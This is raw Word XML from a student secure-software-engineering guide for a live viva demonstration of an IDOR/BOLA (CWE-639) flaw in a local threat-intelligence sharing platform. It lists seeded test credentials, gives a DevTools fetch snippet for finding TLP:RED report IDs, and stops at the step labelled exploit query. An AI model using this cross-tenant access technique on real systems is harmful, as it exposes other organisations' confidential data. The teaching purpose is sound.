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pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>CYBER THREAT INTELLIGENCE (CTI) SHARING PLATFORM</w:t>
        <w:br/>
        <w:t>DEMO READINESS &amp; EXECUTABLE VULNERABILITY DEMONSTRATION GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Course: 24CYS401 – Secure Software Engineering | Topic 29 | Milestones M1–M11 Baseline</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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Specification / Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Target Milestones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Milestones M1–M11 Complete (Read-Only Demo Baseline; Pre-M12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runtime Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Node.js v20+ / Express v4 / SQLite3 (WAL mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>http://localhost:3000 (Health Probe: /api/health)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Automated Test Suites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>53/53 Regression Tests Passing (npm test)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Vulnerability Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5/5 Controlled Demonstration Tests Passing (npm run test:vuln)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cryptographic Audit Trail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tamper-Evident SHA-256 Continuous Hash Chaining Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dissemination Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OASIS STIX 2.1 JSON Feeds with Server-Side TLP Egress Barriers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Document Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Step-by-step hands-on instructions for live faculty viva demonstration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 1 — V02 IDOR/BOLA VULNERABILITY DEMONSTRATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This section provides the exact, hands-on procedure to reproduce Vulnerability 1 (V02 / CWE-639: Broken Object-Level Authorization / Insecure Direct Object Reference) against the live CTI Sharing Platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1 Pre-Requisites &amp; Application Startup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open a Windows Command Prompt (cmd) or PowerShell as Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Navigate to the project root directory and start the platform server:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd /d v:\SSE-ENDSEM</w:t>
              <w:br/>
              <w:t>npm start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirm that the console outputs: '[CTI-SERVER] Platform active on http://localhost:3000'. Keep this terminal open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.2 Seeded Account Credentials &amp; Personas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The controlled demonstration uses two distinct organization personas pre-seeded in the database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Contributor Alex (Submitting Tenant): Username: 'contributor_alex' | Password: 'Password123!' | Organization: 'org-cyber-defense' (Cyber Defense Corp) | Role: 'ROLE_CONTRIBUTOR'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consumer SIEM (Attacking/Unauthorized Tenant): Username: 'consumer_siem' | Password: 'Password123!' | Organization: 'org-cyber-defense' | Role: 'ROLE_CONSUMER' (Lacks analyst clearance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Bank Consumer (Cross-Tenant Boundary): Username: 'consumer_bank' | Password: 'Password123!' | Organization: 'org-fin-bank' (Global Commercial Bank) | Role: 'ROLE_CONSUMER'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.3 Step-by-Step Reproduction Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 (Victim Ingestion): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authenticate as Contributor Alex to generate the victim report. Open your browser at 'http://localhost:3000', select 'Alex Rivera (Threat Contributor)' on Screen 1, enter 'Password123!', and complete MFA with TOTP '123456'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 (Report Creation): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Under Screen 2 ('2. IoC &amp; Report Ingestion'), submit a confidential TLP:RED incident report with Title: 'CONFIDENTIAL: Project Titan Kernel Zero-Day Incursion', TLP: 'RED', Summary: 'Proprietary zero-day vulnerability exploit observed', and Markdown containing internal victim network ranges: '10.240.0.0/16'. Click 'Submit Sanitized Threat Report'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 (Locate Target UUID): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note the returned report UUID (e.g., 'rep-b2549c8d-ef95-44bd-9490-616d8eae6834'). Alternatively, identify an existing TLP:RED report by opening DevTools Console (F12) and executing:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fetch('/api/reports', { headers: { Authorization: 'Bearer ' + localStorage.getItem('cti_jwt') } }).then(r =&gt; r.json()).then(d =&gt; console.table(d.reports.filter(r =&gt; r.tlp_level === 'RED')))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 (Unauthorized Caller): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sign in as an unauthorized consumer from an external organization (or open a second terminal for curl/PowerShell).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 (Exploit Query): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute the unauthorized cross-tenant query using PowerShell or curl:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
